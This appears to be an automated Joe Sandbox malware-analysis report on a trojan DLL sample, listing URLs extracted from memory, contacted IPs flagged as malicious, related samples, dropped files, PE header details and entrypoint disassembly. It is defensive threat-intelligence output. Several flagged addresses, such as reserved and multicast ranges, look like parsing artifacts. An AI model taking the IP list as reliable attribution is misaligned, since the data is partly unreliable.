https://www.hotspotshield.com/terms/	svchost.exe, 00000016.00000003.389730375.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389593585.0000023CC03AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389883804.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389629399.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389660788.0000023CC03B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389642184.0000023CC039A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389783418.0000023CC0802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389683950.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.pango.co/privacy	svchost.exe, 00000016.00000003.389730375.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389593585.0000023CC03AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389883804.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389629399.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389660788.0000023CC03B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389642184.0000023CC039A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389783418.0000023CC0802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389683950.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000E.00000003.296644835.000002516B432000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.318720352.000002516B43B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/enumera	svchost.exe, 00000013.00000002.676470792.000002799A4B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.675741527.000002799A4AC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000B.00000002.774092172.00000175ABA44000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000E.00000002.318685600.000002516B413000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 0000000B.00000002.774092172.00000175ABA44000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.182.25.250	unknown	France	16276	OVHFR	true
8.8.0.0	unknown	United States	3356	LEVEL3US	true
60.7.0.0	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	true
70.36.102.35	unknown	United States	22439	PERFECT-INTERNATIONALUS	true
244.7.0.0	unknown	Reserved	unknown	unknown	true
144.7.0.0	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	true
128.7.0.0	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	true
176.130.193.2	unknown	France	5410	BOUYGTEL-ISPFR	true
44.7.0.0	unknown	United States	7377	UCSDUS	true
48.126.193.2	unknown	United States	2686	ATGS-MMD-ASUS	true
128.130.193.2	unknown	Austria	679	TUNET-ASTechnischeUniversitaetWienAT	true
172.7.0.0	unknown	United States	7018	ATT-INTERNET4US	true
228.7.0.0	unknown	Reserved	unknown	unknown	true
120.8.0.0	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	true
160.135.187.2	unknown	United States	747	DNIC-AS-00747US	true
240.7.0.0	unknown	Reserved	unknown	unknown	true
136.206.195.2	unknown	Ireland	1213	HEANETIE	true
72.7.0.0	unknown	United States	10507	SPCSUS	true
76.7.0.0	unknown	United States	22186	CENTURYLINK-LEGACY-EMBARQ-KSGRNRUS	true
200.7.0.0	unknown	Brazil	262657	DENDENAECIALTDAMEBR	true
96.7.0.0	unknown	United States	262589	INTERNEXABRASILOPERADORADETELECOMUNICACOESSABR	true
140.7.0.0	unknown	United States	668	DNIC-AS-00668US	true
160.7.0.0	unknown	United States	210	WEST-NET-WESTUS	true
224.130.193.2	unknown	Reserved	unknown	unknown	true
51.91.76.89	unknown	France	16276	OVHFR	true
4.8.0.0	unknown	United States	3356	LEVEL3US	true
124.7.0.0	unknown	India	4662	QTCN-ASN1GCNetReachRangeIncTW	true
128.127.193.2	unknown	Saudi Arabia	35753	ITCITCASnumberSA	true
56.8.0.0	unknown	United States	2686	ATGS-MMD-ASUS	true
176.7.0.0	unknown	Germany	12638	AS12638DuesseldorfDE	true
224.7.0.0	unknown	Reserved	unknown	unknown	true
119.193.124.41	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
128.154.195.2	unknown	United States	1749	AS1749US	true
8.109.194.2	unknown	United States	3356	LEVEL3US	true
156.7.0.0	unknown	United States	29975	VODACOM-ZA	true
92.240.254.110	unknown	Slovakia (SLOVAK Republic)	42005	LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSK	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	669368
Start date and time: 20/07/202201:04:09	2022-07-20 01:04:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CUfsVUDkr6 (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@28/8@0/38
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 97.1%) Quality average: 84.2% Quality standard deviation: 23.9%
HCA Information:	Successful, ratio: 88% Number of executed functions: 29 Number of non-executed functions: 278
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 8.248.141.254, 8.248.115.254, 8.248.119.254, 8.248.133.254, 8.238.190.126, 8.248.137.254, 8.238.85.254, 8.248.145.254, 8.241.126.121, 20.223.24.244, 51.104.136.2, 23.205.181.161, 20.106.86.13
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, settings-prod-neu-2.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, settings-prod-wus3-1.westus3.cloudapp.azure.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wu-bg-shim.trafficmanager.net, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.c
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:05:49	API Interceptor	12x Sleep call for process: svchost.exe modified
01:06:38	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
217.182.25.250	psIFSn7VLi.dll	Get hash	malicious	Browse
	dhtylrVZ5y.dll	Get hash	malicious	Browse
	oAqFuoJ9ql.dll	Get hash	malicious	Browse
	MtsZNCJvMI.dll	Get hash	malicious	Browse
	ktrkyRZyaU.dll	Get hash	malicious	Browse
	l2sFDHB0lp.dll	Get hash	malicious	Browse
	h3CGwIXKW7.dll	Get hash	malicious	Browse
	FC6cLk6kKz.dll	Get hash	malicious	Browse
	ViiTOVGM74.dll	Get hash	malicious	Browse
	0xnQJ1y1YE.dll	Get hash	malicious	Browse
	ntn3NlNh90.dll	Get hash	malicious	Browse
	8u6naZBcZi.dll	Get hash	malicious	Browse
	z0zJ7pAKCQ.dll	Get hash	malicious	Browse
	6eeJ2fpp8m.dll	Get hash	malicious	Browse
	form.xlsm	Get hash	malicious	Browse
	f5f5.dll	Get hash	malicious	Browse
	4c96.dll	Get hash	malicious	Browse
	RoundSliderCtrlDemo.dll	Get hash	malicious	Browse
	RoundSliderCtrlDemo.dll	Get hash	malicious	Browse
	gf.dll	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	psIFSn7VLi.dll	Get hash	malicious	Browse	192.99.251.50
	mtOre6QlR1.exe	Get hash	malicious	Browse	51.255.34.118
	LtVtlK0cd0.exe	Get hash	malicious	Browse	37.59.226.102
	VJjbjkQBMt_bin.js	Get hash	malicious	Browse	178.32.27.188
	https://awin1.com/cread.php?awinmid=12045&awinaffid=&ued=&clickref=td1_adid:TWSales&p=http%3A%2F%2Fnoxdirect.web.app%2Fkdix07xvardQ3bd0TR3wH05nZ1	Get hash	malicious	Browse	139.99.6.158
	DOC104.doc	Get hash	malicious	Browse	54.38.217.40
	fax10545.htm	Get hash	malicious	Browse	51.210.32.132
	JUSTIFICANTE DE PAGO.exe	Get hash	malicious	Browse	92.222.97.132
	Adventstiden.exe	Get hash	malicious	Browse	37.59.226.102
	what_is_in_a_supplier_agreement.js	Get hash	malicious	Browse	188.165.135.193
	SecuriteInfo.com.Variant.Doina.40672.15982.exe	Get hash	malicious	Browse	51.210.113.204
	Kalkene174.exe	Get hash	malicious	Browse	37.59.226.102
	H29Sj5e4FT.exe	Get hash	malicious	Browse	94.23.190.57
	axnCDWrZKu.exe	Get hash	malicious	Browse	94.23.190.57
	mM83aORZzI.exe	Get hash	malicious	Browse	94.23.190.57
	http://globall.be/cli/ms.html?email=test@tset.com	Get hash	malicious	Browse	213.186.33.104
	http://globall.be/cli/ms.html?email=test@test.com	Get hash	malicious	Browse	213.186.33.104
	krnl_beta.exe	Get hash	malicious	Browse	145.239.192.146
	BL DOCUMENT&PL.docm	Get hash	malicious	Browse	158.69.236.45
	uC174t8JYa.exe	Get hash	malicious	Browse	94.23.190.57

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24943054221035757
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU42:BJiRdwfu2SRU42
MD5:	EAC6CBA78E26DFB7BB61D6EEA9CD9233
SHA1:	32F8575376F52BC02295E41ECC840AF23A6110AD
SHA-256:	6DE704A99F57D3EF3B912AC3969EDAAABDA5CB828E15F3953DBE9390A0FFD98C
SHA-512:	BA090C9488B99D4B7CC159568B2862277D0A1E50FBB857C7584E9D4C931A8197AF0B8B146EABD5CC98AE1F86D395CAF01665FD964C54C86D9A926807694F42D8
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x9088c28c, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25053946589103243
Encrypted:	false
SSDEEP:	384:BDy+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:BD9SB2nSB2RSjlK/+mLesOj1J2
MD5:	6289483600CFDE69B20838D09C48B5F6
SHA1:	3A1484848D4669A3A6B3A524E2B26FCF8B154AF8
SHA-256:	AE7B6C8427542E8BEFB894172B502EC0B1B446BC520843620DB263F3AFBE0BD6
SHA-512:	1A459B02A4751B90ADE40B8DDFD9D7605B4B3D1F4D569192208F12EA4BF26D754E6954AB19F9A4FF03F2B7F5EE2086DDAFA3477EB16C5731BDDA2E688C162C09
Malicious:	false
Preview:	...... ................e.f.3...w........................)..........z..1....z..h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... ....................................................................................................................................................................................................................................................l......z..................t.7......z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07354863233533379
Encrypted:	false
SSDEEP:	3:td51J7vUDmZGltnWsgT96tySpDiWltall3Vkttlmlnl:v51JrUhgT96o+if3
MD5:	8A1EBFE5A1B1B2F1273C515D06A3C081
SHA1:	70D374D33D986AC3BDEDCA0334CF3DFF39E48914
SHA-256:	FE34E8493F143527E8A5CD57302ACC65BDA112B4DDFD867B5DB77C1A471589DB
SHA-512:	ECA314A85B38017D105C7F997D8E58854B2D9DD80C3DC45A627229E718B2B201303FB8BA574868C10642B28BD93FF079ED321C7E9379B8F16121FC202FC962D2
Malicious:	false
Preview:	..x......................................3...w..1....z.......z...............z.......z....e.;....z.s................t.7......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 61712 bytes, 1 file
Category:	dropped
Size (bytes):	61712
Entropy (8bit):	7.995044632446497
Encrypted:	true
SSDEEP:	1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
MD5:	589C442FC7A0C70DCA927115A700D41E
SHA1:	66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
SHA-256:	2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
SHA-512:	1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
Malicious:	false
Preview:	MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&\|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y\|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..\|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.1274410188478514
Encrypted:	false
SSDEEP:	6:kKF5a/o+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:dgoNkPlE99SNxAhUeE1
MD5:	9DA7953ED0490CCBFA7B4560EFF84FCF
SHA1:	7C9A7A557B675E9011E0A0D0D099A45C1D96B512
SHA-256:	22D98BC937AF79203A67FFD25E89D49F8B5CC38233047B06E24B7B106EB25E17
SHA-512:	3F4E6BFC7179FB9AC5755ECF7BA0FFFA2A49735829FA3492010B525A9B4C1CE23F6AA80247B2CFE09A8CDE2A0AC46B3C42F4227D5FC6F5025D3BFAB89AEED3EB
Malicious:	false
Preview:	p...... ........:.Z.....(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.162757930159871
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zj+o:j+s+v+b+P+m+0+Q+q+E+o
MD5:	B5308DCD26005B3450D279ED7FE2D820
SHA1:	394535BBEA1AA950BAEAC1C41F75BD2FD2DBE084
SHA-256:	FA6B1DF7E415AB95C4203AD01BACE2F0F1E2B698E65B501EE66526F94EBE3BE2
SHA-512:	233FED21AF981199BEB6FE0A3994229ACE6CF7C5436506CBD40D363BC7E39A28FCD6AD0F65A213CC303A5F3E7BC738048A87F14E412FB2650E7869F9F21BEDDD
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.35282778020667
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32% Windows Screen Saver (13104/52) 1.29% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CUfsVUDkr6.dll
File size:	655360
MD5:	543b633663f40468263782155c1e4cdc
SHA1:	0d7e681d49a1ed2a1539845925eac533c1d0dc7c
SHA256:	aa0bfc40ca7a27bbc6491ba35ee5ac38eb5fbdf2a2d8a4ef9332d340c391ca87
SHA512:	40131975bd3baf17e921efd58bc5230e488b7444ee73b3c0ed6f7a3049811a4b011499f98df01b46281f97600331645070912beb6df16f48431e772fb33d3e36
SSDEEP:	6144:/6ZMFXzqfoSHr/mvcQYbi2HN8C8BgifO7y7QcuVqrWLWN7Ypsi6Ih9vH0/oUHahE:/8MFX47ivcQMNsrDRKJjO69cI
TLSH:	27D47C0EFFD1C1B2D36B123019D5C64823ADBF2CEAA1C5B777A8BE1D69326C14512B16
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..0m..cm..cm..c...cg..c...ck..c~..co..c...c\|..cm..c@..ch..cq..ch..c...cF..cd..ch..c...ch..cl..c...cl..ch..cl..cRichm..c.......

File Icon


Icon Hash:	c0cc4c687ccccc78

Static PE Info

General

Entrypoint:	0x1001131c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x623CFB7E [Thu Mar 24 23:15:10 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d63ab94f4bb6b5d2f0f6092bf07e00ac

Entrypoint Preview

Instruction
push 0000000Ch
push 10041D40h
call 00007F306CBA2691h
xor eax, eax
inc eax
mov dword ptr [ebp-1Ch], eax
mov esi, dword ptr [ebp+0Ch]
xor edi, edi
cmp esi, edi
jne 00007F306CBA14AEh
cmp dword ptr [1004F3C8h], edi
je 00007F306CBA1559h
mov dword ptr [ebp-04h], edi
cmp esi, eax
je 00007F306CBA14A7h
cmp esi, 02h
jne 00007F306CBA14D3h
mov eax, dword ptr [10050CB4h]
cmp eax, edi
je 00007F306CBA14AEh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], edi
je 00007F306CBA152Bh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F306CBA12C7h
mov dword ptr [ebp-1Ch], eax
cmp eax, edi
je 00007F306CBA1514h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F306CB96238h
mov dword ptr [ebp-1Ch], eax
cmp esi, 01h
jne 00007F306CBA14B0h
cmp eax, edi
jne 00007F306CBA14ACh
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F306CBA129Dh
cmp esi, edi
je 00007F306CBA14A7h
cmp esi, 03h
jne 00007F306CBA14CBh
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F306CBA128Ah
test eax, eax
jne 00007F306CBA14A5h
mov dword ptr [ebp-1Ch], edi
cmp dword ptr [ebp-1Ch], edi
je 00007F306CBA14B5h
mov eax, dword ptr [10050CB4h]
cmp eax, edi
je 00007F306CBA14ACh
push ebx
push esi
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp-1Ch], eax
or dword ptr [ebp-04h], FFFFFFFFh
mov eax, dword ptr [ebp-1Ch]
jmp 00007F306CBA14BCh
mov eax, dword ptr [ebp-14h]
mov ecx, dword ptr [eax]

Rich Headers

Programming Language:

[ASM] VS2003 (.NET) build 3077
[ C ] VS2003 (.NET) build 3077
[C++] VS2003 (.NET) build 3077
[EXP] VS2003 (.NET) build 3077
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) build 3077

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4aa40	0x6e	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x48844	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0x480a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0x4e40	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x43830	0x48	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
